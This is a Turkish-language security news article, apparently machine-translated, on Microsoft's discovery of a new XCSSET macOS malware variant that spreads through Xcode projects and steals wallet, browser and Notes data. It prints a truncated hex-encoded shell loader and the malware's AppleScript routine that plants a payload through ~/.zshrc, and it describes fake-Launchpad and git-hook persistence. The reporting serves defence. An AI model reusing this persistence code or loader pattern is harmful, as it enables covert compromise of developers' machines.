Microsoft Tehdit İstihbaratı, XCODE projelerini enfekte eden ve geliştiriciler bu projeleri oluşturduklarında yürütülen sofistike bir modüler macOS kötü amaçlı yazılım olan yeni bir XCSSET varyantı keşfetti.
Bu, 2022’den beri gelişmiş gizleme yöntemleri, güncellenmiş kalıcılık mekanizmaları ve MacOS kullanıcılarından hassas bilgileri çalmak için tasarlanmış yeni enfeksiyon stratejileri içeren ilk bilinen XCSSET varyantıdır.
Kötü amaçlı yazılımların enfeksiyon stratejisi, proje dosyalarının Apple veya MacOS ile ilgili uygulamalar üzerinde çalışan geliştiriciler arasında paylaşımından yararlanır.
XCSSET’in yeni varyantı, yoğun kodlanmış yükler ve geliştirilmiş hata işleme ile modüler bir yaklaşım kullanır.
Etkilenen cihazlarda düşük bir profil korumak ve mümkün olduğunca filtrelemeye devam etmek için senaryo dillerini, Unix komutlarını ve meşru ikili dosyaları kapsamlı bir şekilde kullanır, algılama ve kaldırmayı zorlaştırır.
Kod düzeyinde, kötü amaçlı yazılım, statik analizi engellemek için modül adlarını gizler ve yük oluşturmak için randomize bir yaklaşım kullanır.
Önceki varyantlar yalnızca kodlama için XXD’ye (HexDump) güvenirken, en sonuncusu Base64 kodlama tekniklerini de içerir.
Kötü amaçlı yazılım, yeni bir kabuk oturumu başladığında, bir kullanıcı sahte bir Launchpad uygulaması açtığında veya bir geliştirici GIT’de değişiklikler gerçekleştirir.
Microsoft araştırmacıları, enfeksiyon zincirinin enfekte bir Xcode projesi oluştururken çalışan gizlenmiş bir kabuk yükü ile başlayarak dört aşamadan oluştuğunu belirtti.
.webp)
Bu birinci aşama yük, kabuğa borulanmadan önce bir onaltılık kod çözücünün birden fazla yinelemesinden geçer:-
sh -c"(echo 33336363233343633335233303536İlk enfeksiyondan sonra, kötü amaçlı yazılım, sistem bilgilerini çalan bileşenler, tarayıcı uzantısı verileri, dijital cüzdan bilgileri ve notlar uygulamasından notlar dahil olmak üzere komut ve kontrol sunucusundan (C2) ek modüller indirir.
Kalıcılık teknikleri
Kötü amaçlı yazılım, birkaç sofistike yöntemle kalıcılık oluşturur. Bir yaklaşım, yeni bir kabuk oturumu başladığında ~/.zshrc dosyasını kötü amaçlı kod yürütmek için değiştirir.
.webp)
Kötü amaçlı yazılımın ZSHRC kalıcılık yöntemi, kötü amaçlı dosyayı kaldırmadan veya oluşturmadan ve güncellemeden önce bir geri yükleme bayrağını kontrol eder:-
on doMain()
try
if RESTORE_DEFAULT is true then
do shell script "rm -f ~/.zshrc_aliases"
log ".zshrc_aliases removed"
else
set payload to getPayloadBody("Terminal")
set payload to quoted form of payload
do shell script "echo " & payload & " > ~/.zshrc_aliases"
log ".zshrc_aliases updated"
set payload to "[ -f $HOME/.zshrc_aliases ] && . $HOME/.zshrc_aliases"
set payload to quoted form of payload
do shell script "touch ~/.zshrc"
do shell script "grep -qF '.zshrc_aliases' ~/.zshrc || echo " & payload & " >> ~/.zshrc"
log ".zshrc done"
end if
on error the errorMessage
log "failed at .zshrc: " & errorMessage
return
end try
end doMainBaşka bir kalıcılık tekniği, bir kullanıcı meşru fırlatma rampasını açmaya çalıştığında kötü amaçlı kod yürüten sahte bir Launchpad uygulaması oluşturmayı içerir.
Kötü amaçlı yazılım ayrıca, geliştiriciler değişiklikler yaptığında yükünü yürütmek için taahhüt öncesi kancaları değiştirerek GIT depolarını enfekte eder.
Microsoft, kullanıcıların en son işletim sistemi sürümlerini çalıştırmasını, Xcode projelerini dikkatlice incelemelerini ve Mac’de Mac’de Microsoft Defender gibi güvenlik çözümlerini, kötü amaçlı yazılım varyantlarını algılayabilen ve karantinaya çıkarabilmelerini önerir.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.